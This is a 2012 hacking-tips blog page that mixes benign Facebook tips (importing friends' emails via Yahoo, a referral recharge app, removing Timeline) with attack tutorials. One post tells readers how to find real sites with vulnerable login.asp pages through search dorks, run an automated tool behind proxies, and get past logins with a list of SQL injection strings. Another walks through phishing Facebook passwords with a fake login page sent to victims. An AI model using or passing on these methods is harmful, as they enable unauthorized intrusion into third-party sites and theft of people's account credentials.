Recent Posts


Welcome To My Blog

Hello Guys,I am Bassel and I welcome you to my blog.

This Group is made for those People who want to learn more about computers

This blog provides you with free Tips and Tricks about Computer and teacher you how you could save yourself from hacking.

Knowledge is For Sharing.

Remember Guys...This Group doesn't encourage you to do hacking.Legally,Hacking is a Crime and a Hacker is a Criminal.Everything I teach You here is for Knowledge Pupose.

Solutions to your Problems

Anyone can ask Me about problems of their Computers and I'll Help you with that.

Follow Me Please!

If You like the Tricks and Posts in this blog you can Follow it too.

Showing posts with label Facebook Hacking. Show all posts
Showing posts with label Facebook Hacking. Show all posts

Tuesday, February 28, 2012

How To Get Email Id Of Your All Facebook Friends By Dailyhackingtips | Find Hidden Email On Facebook


Hello To All friends Today i am going to show you how can you get hidden email ids of your all facebook friends.

Just follow the given steps for do this.


1. If your facebook profile is not connected with yahoo mail then you first create an email id in yahoo and connect your facebook account with yahoo email id.

2. Now You login To Yahoo Mail And Then Go To The Contacts Tab.

3. Now You click on Import Contacts


4. Now Click On Facebook


5. In Pop up You Will Get Message That Do You Want To Share Your contacts with yahoo. and now click on ok !


6. Now You will Get A Message .





Now You are done :) Click on View Imported Contacts And See You Facebook Friends Email ids .

That's it

How To Get Free Mobile Recharge Using Embeepay Facebook Application - Free Recharge Tips And Tricks


Hello to all friends if you want free online mobile recharge then you can your mobile recharge with Embeepay facebook application. if any one don't know that how to get free mobile recharge using embeepay facebook application then just follow the given below steps .

1. First you login in your facebook account.


2. now you open Embeepay facebook application by click here
3. now you confirm your own mobile noumber and email adress to instanly get 100 points

4. now you refer your friends for this application and you will get 300 points for first five refrealls and for rest of the refreals then you will be credited 1 point for each 20 points earned by your own refreals.

4. To get more points you can also do surveys which are worth 10-30 points each.


Here Is Point To Free Mobile Recharge Breakdown List

1. 150 Points = $1 Rs. 50/-

2. 300 Points = $2 Rs. 100/-

3. 500 Points = $3 Rs. 200/-

4. 800 Points = $6 Rs. 300/-

5. 1600 Points =$12 Rs. 600/-


So Guys just refrening 5 friends you beocme eligible for 100 Rs. Recharge .

That's it

Sunday, February 26, 2012

How To: Disable Or Remove Facebook Timeline Beta Profile


Some people may not like this new profile page and willing to bring back old Facebook Profile page. For all the guys/gals who want to come back to old Facebook profile here is the simple way to do it.
Facebook Old Profile Page
Before we do that, I just want to confirm that you have created a new Facebook app with Facebook developer account and enabled Open Graph features in order to get Facebook Timeline. If you have used this method to enable Facebook Timeline profile then following very simple steps helps you to get rid of timeline profile.
Click here to go to Facebook Apps page.
Click on the app you have created where you have enabled Open Graph from the left hand side navigation menu.
Click on Edit Open Graph as shown in the below picture.
Facebook App Page
Delete all three Open Graph settings by clicking on the buttons mentioned below.
Facebook Open Graphs Settings Page
Just go back to your profile page in Facebook home page, you can see your old Facebook profile page is back.
UPDATE: Facebook Timeline is now available for everyone worldwide. Above method may not work for the user who got final version of Timeline.
\

What is SQL Injection and How to do it





One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works

SEARCH:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question


WHAT I DO :

first let me go into details on how i go about my research

i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder

INJECTION STRINGS:HOW ?

this is the easiest part...very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:' or 1=1--

or

user:' or 1=1--
admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used

there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper

the one am interested in are quick access to targets

PROGRAM

i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??

combo example:

admin:' or a=a--
admin:' or 1=1--

and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string

now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search

17,000 possible targets trying various searches spews out plent more


now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me

i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...

sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs

am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as login process


(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

happy hunting

Saturday, February 25, 2012

HACK FACEBOOK VIA PHISHING





  • HI GUYZ TODAY I M GOING TO TELL YOU HOW TO HACK FACEBOOK VIA PHISHING :-
  • FIRST DOWNLOAD THE PHISHING SOFTWARE
              DOWNLOAD  U CAN DOWNLOAD MANY MORE PHISHING SOFTWARE FROM MEDIAFIRE. OR CREATE YOUR OWN
  • EXTAND THE TWO FILES IN THAT SOFTWARE ON YOUR SYSTEM (PC)
  • NOW CREATE A ACCOUNT ON FREE WEBHOSTING SITES JUST LIKE (WWW.MY3GB.COM) OR (WWW.5GB.COM) 
    • UPLOAD ALL THE FILES ON (WWW.MY3GB.COM) IN YOUR FREE WEBHOSTING SITES YOU WILL SEE SOMETHING LIKE THAT :-
AFTER UPLOADING  IT
  • NOW SHORTEN THE NAME OF THE VICTIM (NAME.MY3GB.COM/INDEX.HTML  IN GOOGLE URL  FOR EVERYTIME 
  • NOW SENT THE LINK  (GOO.GL____) TO VICTIM & MAKES YOUR VICTIM LOGIN OR SEND YOUR FAKE URL OF FB LOGIN TO YOUR VICTIMS EMAIL 

  • ONCE YOUR VICTIM LOGED IN YOUR FAKE PAGE JUST RECIEVE PASSWORD IN LOG.TXT 



 
Twitter Bird Gadget